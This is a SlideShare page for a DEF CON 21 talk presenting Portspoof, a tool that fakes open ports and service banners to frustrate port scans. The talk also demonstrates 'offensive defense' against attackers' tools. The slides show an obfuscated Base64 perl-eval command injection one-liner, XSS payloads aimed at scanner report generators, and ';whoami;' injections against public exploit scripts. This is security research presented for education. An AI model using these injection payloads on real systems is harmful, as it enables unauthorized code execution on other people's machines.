© 2012
Presented by:
Pwn’ing you(r) cyber offenders
Piotr Duszynski
@drk1wi
© 2012
;WHOAMI;#?
• Senior Security Consultant @Trustwave (OSCE, OSCP, …)
• In security field for the past 6 years, hackin...
© 2012
What is this presentation about?
1. “Annoyance and Camouflage” (reconnaissance phase)
New defensive technique that ...
© 2012© 2012
“To blind attackers’ tools”
The art of Annoyance and Camouflage
© 2012
A typical reconnaissance phase
• Standard case scenario (target system is behind a Firewall)
5
# nmap -sV -O portsp...
© 2012
Portspoof – implementation of the idea
6
What if (worst case scenario):
• All 65535 ports appear to be open …
*Port...
© 2012
Spicing up the reconnaissance phase
with Portspoof
• Worst case scenario (target system is behind the Portspoof) :
...
© 2012
Spicing up attackers‟ port scan results
8
Scanning statistics:
65.535 open ports (services)
~120 MB of sent data
30...
© 2012
Spicing up attackers‟ port scan results
9
© 2012
Spicing up attackers‟ port scan results
10
… and somewhere in the
results you can find the
hidden message …
© 2012
Spicing up attackers‟ port scan results
• NMAP OS identification results
11
$ nmap –sV -O portspoof.org
© 2012
Spicing up attackers‟ port scan results
• NMAP OS identification results:
12
Device type: general purpose
Running (...
© 2012
Spicing up attackers‟ port scan results
• AMAP: $ amap -q portspoof.org 3000-3100
13
© 2012
Spicing up attackers‟ port scan results -
conclusions
• SYN/ACK/FIN/… stealth scans are no longer helpful!
• OS ide...
© 2012
Bypassing Portspoof
• There is no trivial way to detect false signatures
• IP Fragmentation and other network evasi...
© 2012
Portspoof tool
• User space software running without root priv. ! (no kernel
modules)
• Binds to just one port per ...
© 2012© 2012
“Active (Offensive) Defense in practice”
exploiting your attackers‟ tools…
“The best defense is a good offens...
© 2012
Automated exploitation through Nmap
Interesting injection points through NMAP service probe engine:
• Version field...
© 2012
Open source reporting tool:
XSS example
19
Nmap report generation tool nr.1 (anonymous)
Tip: Safari „Same Origin Po...
© 2012
Commercial port scanner:
non-Nmap XSS example
20
report generation tool nr. 2 (McAfee SuperScan 4.0)
XSS payload: p...
© 2012
Public exploit script:
OS command injection example nr.3
21
Exploiting your attackers’ exploits :D
# Lotus CMS 3.0 ...
© 2012
Public exploit script:
OS command injection example
22
Portspoof exploiting payload: 80 “whoamin”
Exploits‟ new ext...
© 2012
Public exploit script:
OS command injection example
23
Creating a weaponized OS command injection payload one-liner...
© 2012
Public exploit script:
OS command injection example
24
Exploits‟ new extra output:
Vulnerable code : $( cat “storag...
© 2012
Public exploit script:
OS command injection example nr.4
25
cookie=
`printf "GET /jmx-console/ HTTP/1.1nHost: $1nn"...
© 2012
Blind exploitation with Portspoof (aka.
Aggressive Honeypot)
26
Conclusions:
- Majority of exploits, reporting tool...
© 2012
In hunt for a vulnerable software …
Use your Google jutsu skills (previous examples were found in TOP10) :
27
And y...
© 2012© 2012
Nmap NSE script PWN Demo
© 2012
Thank you 
Portspoof URLs:
http://portspoof.org/
Mailing list:
portspoof-users-subscribe@portspoof.org
Git reposit...
Upcoming SlideShare
Loading in …5
×

DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"

1,005 views
905 views

Published on

It is commonly believed that Offensive Defense is just a theory that is difficult to be used effectively in practice, but that is not entirely true...

During my talk along with a new service emulation technique, that will render standard port scanner results nearly useless and leave your attackers with an arduous analysis, I will focus on practical (automated) exploitation of a hackers' offensive toolbox. A few interesting attack vectors against software taken from the Internet will be presented.

It turns out you can get pwn'ed even through your Nmap scripts if you are not careful enough.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,005
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
10
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • Thanks for coming, start presentation
  • shortly
  • Results of my attempt to put some of the Active Defense concepts into practiceTechnique that aims at slowing down your attackers and keeping them from staying low profile (nearly- infinite time)Example based, that tries to show the potential that lies in Offensive Defense/automated (exploiting your attackers exploits)
  • Knowledge is the key, port scan
  • Starting point for every pentest …
  • IdeaImplemented (Portspoof)Results?
  • Get a precise view …
  • Our offenders will get more information then they ever wanted…
  • Closer lookA whole range of different services (possibly none or all of them are valid)So, you have finished the scan and still know almost nothing…
  • Bonus protection (none port is closes)
  • The same goes for other port scanners…
  • TIME –TIME – STEALTH –
  • User spaceNo rootEasy configurable
  • - Exploiting attacker’s tools and exploitsExample based with few interesting vectors and examples (top of an ice mountain)
  • Lets come back to Nmap again (due itspopoularity)Injection pointsPORTSPOFO OUTPUT - Set up our software to have different payloads on each port (good approach for automated tools)
  • In practice if your system returns the following service banner (that will match Nmap regular expression).“Hello World” example
  • Non Nmap based example
  • Storage file content is under our controlSimple payload will exploit attackers machine
  • You can use the previously created payload for automated exploitation
  • Straigjtforward vulnerability Again whoami will exploit attackers machine…
  • DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"

    1. 1. © 2012 Presented by: Pwn’ing you(r) cyber offenders Piotr Duszynski @drk1wi
    2. 2. © 2012 ;WHOAMI;#? • Senior Security Consultant @Trustwave (OSCE, OSCP, …) • In security field for the past 6 years, hacking since 9 … • Enjoys security research, crazy road trips and good music 2
    3. 3. © 2012 What is this presentation about? 1. “Annoyance and Camouflage” (reconnaissance phase) New defensive technique that renders your attacker‟s port scan results nearly useless … 2. “Active (Offensive) Defense” New attack vectors against you(r) attackers offensive toolbox … • POC DEMO: example exploit for one of the well known scanners. 3 Active Defense in practice
    4. 4. © 2012© 2012 “To blind attackers’ tools” The art of Annoyance and Camouflage
    5. 5. © 2012 A typical reconnaissance phase • Standard case scenario (target system is behind a Firewall) 5 # nmap -sV -O portspoof.org
    6. 6. © 2012 Portspoof – implementation of the idea 6 What if (worst case scenario): • All 65535 ports appear to be open … *Portspoof will bind to a single port • On every open port there appears to be a service listening… *Portspoof will dynamically generate valid service signatures ~ 8000 supported TASK: Get a precise view of all running services…
    7. 7. © 2012 Spicing up the reconnaissance phase with Portspoof • Worst case scenario (target system is behind the Portspoof) : 7 $ nmap –sV -p - -PN portspoof.org …. You will need a lot of patience!
    8. 8. © 2012 Spicing up attackers‟ port scan results 8 Scanning statistics: 65.535 open ports (services) ~120 MB of sent data 30682 s (8.5h) and few beers later …
    9. 9. © 2012 Spicing up attackers‟ port scan results 9
    10. 10. © 2012 Spicing up attackers‟ port scan results 10 … and somewhere in the results you can find the hidden message …
    11. 11. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results 11 $ nmap –sV -O portspoof.org
    12. 12. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results: 12 Device type: general purpose Running (JUST GUESSING): Linux 3.X (93%) OS CPE: cpe:/o:linux:linux_kernel:3 Aggressive OS guesses: Linux 3.2 (93%), Linux 3.0 (92%), Linux 3.0 - 3.2 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Hosts: gTknkkuB, ouwH-rKWw, bWQnRo, ClFfHC, leLtAJg; OSs: Unix, Windows, Linux, Solaris, NetWare; Devices: print server, webcam, router, storage-misc, printer; CPE: cpe:/o:microsoft:windows, cpe:/o:redhat:linux, cpe:/o:sun:sunos,cpe:/o:novell:netware, cpe:/o:linux:linux_kernel
    13. 13. © 2012 Spicing up attackers‟ port scan results • AMAP: $ amap -q portspoof.org 3000-3100 13
    14. 14. © 2012 Spicing up attackers‟ port scan results - conclusions • SYN/ACK/FIN/… stealth scans are no longer helpful! • OS identification is a bit more challenging … • Forces to generate a huge amount of traffic through service probes … • Frustrates and forces to carry out a huge amount of arduous by your attackers … 14 “Security by obscurity” - but so is the mimicry in the natural environment…
    15. 15. © 2012 Bypassing Portspoof • There is no trivial way to detect false signatures • IP Fragmentation and other network evasion techniques will not work • Thread pool exhaustion (Full connect TCP DOS): $ nmap -sV portspoof.org (30 parallel instances) ~ 999/1000 ports were found as open ANTI-DOS SOLUTION: 1. Play with Portspoof thread count and client/thread parameters . 2. Use iptables mark rules and tc (traffic shaper). 15 Please send any bypass ideas to the portspoof mailing list ;)
    16. 16. © 2012 Portspoof tool • User space software running without root priv. ! (no kernel modules) • Binds to just one port per instance (127.0.0.1:4444) • Configurable through iptables: - A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444 16
    17. 17. © 2012© 2012 “Active (Offensive) Defense in practice” exploiting your attackers‟ tools… “The best defense is a good offense” - Sun Tzu (The Art of War)
    18. 18. © 2012 Automated exploitation through Nmap Interesting injection points through NMAP service probe engine: • Version fields • Hosts fields 18 ./portspoof –f fuzz_payloads –n fuzz_nmap_signatures
    19. 19. © 2012 Open source reporting tool: XSS example 19 Nmap report generation tool nr.1 (anonymous) Tip: Safari „Same Origin Policy‟ for file URIs doesn‟t work. Regards to Michele Orru!
    20. 20. © 2012 Commercial port scanner: non-Nmap XSS example 20 report generation tool nr. 2 (McAfee SuperScan 4.0) XSS payload: partially UTF-7 encoded without parenthesis
    21. 21. © 2012 Public exploit script: OS command injection example nr.3 21 Exploiting your attackers’ exploits :D # Lotus CMS 3.0 eval() Remote Command Execution Exploit:
    22. 22. © 2012 Public exploit script: OS command injection example 22 Portspoof exploiting payload: 80 “whoamin” Exploits‟ new extra output: Vulnerable code : $( cat “storage2” ) FAIL ----->
    23. 23. © 2012 Public exploit script: OS command injection example 23 Creating a weaponized OS command injection payload one-liner for : --------------------------------------------------------------------------------------------- /bin/basht-ct{perl,-e,$0,useSPACEMIME::Base64,B64_perl_payload }t $_=$ARGV[0];~s/SPACE/t/ig;eval;$_=$ARGV[1];eval(decode_base64($_)); ----------------------------------------------------------------------------------------------------- • Use t instead of spaces • Use „Bash Brace Expansion‟ to address the lack of apostrophes • Use regex to add additional t • Import missing packages on the fly and execute Base64 encoded payload >:] $(cat file)
    24. 24. © 2012 Public exploit script: OS command injection example 24 Exploits‟ new extra output: Vulnerable code : $( cat “storage2” )
    25. 25. © 2012 Public exploit script: OS command injection example nr.4 25 cookie= `printf "GET /jmx-console/ HTTP/1.1nHost: $1nn" | nc $1 $2| grep -i JSESSION | cut -d: -f2- | cut -d; -f1` Code snippet from one of the „auto_pwn‟ scripts: Portspoof exploiting payload: 80 “whoamin”
    26. 26. © 2012 Blind exploitation with Portspoof (aka. Aggressive Honeypot) 26 Conclusions: - Majority of exploits, reporting tools and scanning software is exploitable with simple payloads … ;whoami; - Auto-PWN scripts are usually dumb (they try to exploit all ports) … To rule them all…
    27. 27. © 2012 In hunt for a vulnerable software … Use your Google jutsu skills (previous examples were found in TOP10) : 27 And you will find many interesting targets… Tip: search for .sh (~8000 results), .pl , etc.
    28. 28. © 2012© 2012 Nmap NSE script PWN Demo
    29. 29. © 2012 Thank you  Portspoof URLs: http://portspoof.org/ Mailing list: portspoof-users-subscribe@portspoof.org Git repository (including the presented exploits): https://github.com/drk1wi/portspoof/ Contact me: piotr[at]duszynski.eu (PGP fingerprint: FCD2 B5DA 1AE2 056F 4AC8 901D 7258 7496 ECCD 36F3) http://twitter/drk1wi 29

    ×